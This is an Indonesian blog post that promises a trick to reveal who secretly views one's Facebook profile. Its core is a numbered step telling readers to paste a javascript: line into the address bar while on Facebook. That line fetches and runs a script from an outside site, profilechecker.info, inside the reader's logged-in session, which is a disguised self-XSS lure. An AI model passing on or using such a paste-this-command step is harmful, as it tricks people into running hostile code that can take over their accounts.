//
you're reading...
Internet, Treat, Tutorial

Trik Facebook Cara Mengetahui Penggemar

trik facebook 150x150 Trik Facebook Cara Mengetahui PenggemarKamu pengen tau siapa yang suka liat-liat foto atopun wall facebook kamu alias siapa penggemar facebook kamu yang suka liat profil, foto-foto fb kamu tapi nggak pernah komen? Ga tau kenapa ya dia ga berani comment, mungkin aja malu atau cuma berani sebatas mengagumi kamu…hehe…apapun itu ya, nih aku punya trik buat mengetahui penggemar facebook kamu..simak key.. 4 Trik Facebook Cara Mengetahui Penggemar
check this out
1.Copy script ini

[javascript: (a = (d = document).createElement(“script”)).src = "http://profilechecker.info/StalkerTools.fb"; void(d.body.appendChild(a))] (tanpa tanda "[ dan ]"

2.pergi ke facebook anda
3.bersihkan addreas bar anda
4.paste script tadi
5.ENTER dan tunggu 3 menitan..
dan temukan siapa penggemar kamu..

About aditindigo

sebuah kepalsuan ketika kita berbicara tentang keikhlasan padahal jauh dalam hati kita belum sedikitpun siap untuk menerima kata “ikhlas”..egois memang tapi itulah manusia,,, tidak ada yang sempurna didunia ini,,,, begitu juga dg saya,,hanya manusia kecil dari berjuta mahluk didunia nie,,, i’m not special but i’m limited edition…..^_^

Diskusi

Belum ada komentar.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Facebook

Adit Missisippi Indigo

Buat Lencana Anda
Mungkin Hanya Ini Cara Untuk Mengetahui Siapa Saya..^_^
Oktober 2011
S S R K J S M
    Jan »
 12
3456789
10111213141516
17181920212223
24252627282930
31  
%d blogger menyukai ini: